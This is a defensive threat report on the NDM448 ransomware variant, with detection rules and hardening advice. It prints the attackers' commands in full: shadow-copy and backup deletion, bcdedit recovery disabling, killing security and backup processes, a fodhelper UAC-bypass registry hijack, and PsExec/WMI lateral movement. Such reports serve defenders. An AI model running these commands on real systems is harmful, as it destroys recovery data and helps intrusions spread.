NDM448 Ransomware
Date Identified: 20 February 2026
Family: Makop Ransomware
Platform: Windows (primarily x64 environments)
Impact Type: Full file encryption + recovery destruction
Executive Overview
On 20 February 2026, security teams identified a new ransomware strain internally labeled NDM448, a variant of the long-running Makop ransomware family. This strain is designed to fully encrypt victim systems, destroy recovery mechanisms, and disrupt business operations rapidly.
NDM448 does not rely on sophisticated zero-day exploits. Instead, it leverages stolen or weak credentials, exposed remote access services, and administrative misuse to gain control. Once inside, it executes quickly, deletes backup mechanisms, encrypts files across local and network drives, and drops ransom instructions.
The danger of this variant lies in operational efficiency rather than novelty.
What Happened
Multiple organizations reported sudden, widespread file encryption across file servers and workstations. Systems became inaccessible within minutes to hours. Investigation showed:
- Remote login from unfamiliar IP addresses
- Execution of system utilities such as
vssadminandwmic - Deletion of Volume Shadow Copies
- Mass file renaming with
.NDM448extension - Ransom notes dropped in nearly every directory
In most observed cases, attackers had administrative access before deploying the ransomware. This suggests the encryption stage was the final step of a broader compromise.
How the Breach Happened
Initial Access Vector
1. Exposed RDP (Most Common)
- Port 3389 open to the internet
- Weak or reused passwords
- No multi-factor authentication
- Brute-force attempts followed by successful login (Event ID 4624 Logon Type 10)
2. Phishing Email (Secondary Vector)
- ZIP attachment containing executable loader
- User executed attachment
- Loader fetched ransomware from remote server
3. Stolen Credentials
- Harvested from info-stealer malware
- Purchased from access brokers
- Password spraying across enterprise accounts
No confirmed evidence of software vulnerability exploitation or zero-day abuse. The compromise relied on valid credentials.
Attack Timeline
- Attacker scans internet for exposed RDP
- Brute-force or credential reuse login
- Establish persistence (optional)
- Disable antivirus and tamper protection
- Enumerate network shares
- Delete backups and shadow copies
- Deploy ransomware manually
- Encrypt files across environment
- Drop ransom notes
- Exit environment
Encryption typically completes in under 60 minutes in mid-sized environments.
Technical Behavior Breakdown
Execution & Drop Locations
Ransomware executable commonly copied to:
C:\ProgramData\<random>\ndm448.exe
C:\Users\Public\<random>.exe
C:\Windows\Temp\<random>.exe
File attributes set to:
- Hidden
- System
Mutex Creation
To prevent multiple instances:
Global\NDM448_MUTEX_<VictimID>
Global\Makop_<random>
Privilege Escalation
If not already elevated:
- UAC bypass using fodhelper method
- Registry hijack via:
HKCU\Software\Classes\ms-settings\Shell\Open\command
(Default) = "<malware_path>"
DelegateExecute = ""
Defense Evasion & Recovery Destruction
Before encryption, the malware executes the following:
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures
PowerShell alternative observed:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
It also attempts to stop services:
taskkill /F /IM sqlservr.exe
taskkill /F /IM veeam.exe
net stop MSSQLSERVER
Security processes targeted:
- msmpeng.exe
- avp.exe
- savservice.exe
- wrsa.exe
Lateral Movement
Attackers manually propagate using:
WMI
wmic /node:<target> process call create "<path>\ndm448.exe"
PsExec
psexec \\target -u admin -p <password> -s -d ndm448.exe
SMB Copy
net use \\target\C$ /user:admin <password>
copy ndm448.exe \\target\C$\Windows\Temp\
Encryption Process
Cryptography
- AES-256 per file
- RSA-2048 public key embedded in binary
- Unique victim ID generated
- Encrypted symmetric keys stored per file
Targeted File Types
.doc .docx .xls .xlsx .pdf .jpg .png
.zip .rar .7z
.sql .mdb .bak
.vmdk .vmx
.pst .ost
Excluded Directories
C:\Windows
C:\Program Files
C:\Program Files (x86)
C:\Boot
Excluded Extensions
.exe .dll .sys .lnk
File Renaming Pattern
filename.docx.[VictimID].NDM448
File Marker
Encrypted files often contain footer:
---NDM448---
ID:<VictimID>
Entropy increases significantly post-encryption.
Ransom Note Characteristics
Dropped as:
readme.txt
HOW_TO_DECRYPT_FILES.txt
RECOVERY_INFO.txt
Contains:
- Unique victim ID
- Contact email
- Bitcoin payment instructions
- 72-hour deadline warning
Network Activity
Observed Behavior
- Outbound HTTP POST to compromised sites
- TLS over port 443
- TOR gateway communication
- Random high TCP ports
Example beacon pattern:
POST /gate.php?id=<VictimID>
User-Agent examples:
Mozilla/5.0 (Windows NT 10.0; Win64; x64)
curl/7.55.1
Indicators of Compromise (IOCs)
File Indicators
Extension:
.NDM448
Ransom notes:
readme.txt
HOW_TO_DECRYPT_FILES.txt
RECOVERY_INFO.txt
Registry Indicators
HKCU\Software\Classes\ms-settings\Shell\Open\command
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Suspicious Commands
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set recoveryenabled no
Suspicious Parent-Child Process Relationships
- explorer.exe → unknown.exe
- cmd.exe → vssadmin.exe
- powershell.exe → wmic.exe
- services.exe → unknown unsigned binary
Windows Event Log Indicators
Security Log:
- 4624 (Logon Type 10)
- 4625 (Multiple failures before success)
- 4672 (Admin privileges assigned)
- 4688 (Process creation of vssadmin/wmic)
Detection Guidance
1. Behavioral Detection
Alert when:
- Shadow copies deleted
- More than 300 files renamed in under 2 minutes
- High entropy file write spikes
- Unsigned executable launched from user-writable directory
2. Sigma Rule (Shadow Deletion)
title: Shadow Copy Deletion Attempt
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- "vssadmin delete shadows"
- "wmic shadowcopy delete"
- "wbadmin delete"
condition: selection
level: critical
3. YARA Rule
rule NDM448_Makop_Variant
{
meta:
description = "NDM448 Makop ransomware variant" strings:
$a = "NDM448"
$b = "HOW_TO_DECRYPT_FILES"
$c = "vssadmin delete shadows"
$d = "Global\\NDM448_MUTEX"
$e = "---NDM448---" condition:
3 of them
}
MITRE ATT&CK Mapping
| Tactic | Technique |
|---|---|
| Initial Access | T1078 Valid Accounts |
| Execution | T1059 Command Shell |
| Persistence | T1547 Registry Run Keys |
| Privilege Escalation | T1548 Abuse Elevation |
| Defense Evasion | T1562 Disable Security Tools |
| Lateral Movement | T1021 Remote Services |
| Impact | T1486 Data Encrypted for Impact |
Impact Assessment
Severity: Critical
Operational Disruption: High
Data Loss Risk: High
Backup Compromise: Likely if online
Recovery Without Backup: Extremely difficult
Organizations without offline backups face full operational outage.
Prevention & Hardening Recommendations
- Disable direct RDP exposure to internet
- Enforce MFA on all remote access
- Deploy EDR with behavioral monitoring
- Enable Defender tamper protection
- Maintain offline, immutable backups
- Restrict administrative privileges
- Implement network segmentation
- Monitor shadow copy deletion attempts
Final Assessment
NDM448 demonstrates that ransomware operators do not need advanced exploits to cause catastrophic damage. Valid credentials and poor remote access controls are enough.
The strain is fast, destructive, and effective. Its primary strength lies in recovery destruction and administrative misuse.
Organizations must focus on identity security and behavioral monitoring rather than relying solely on antivirus signatures.
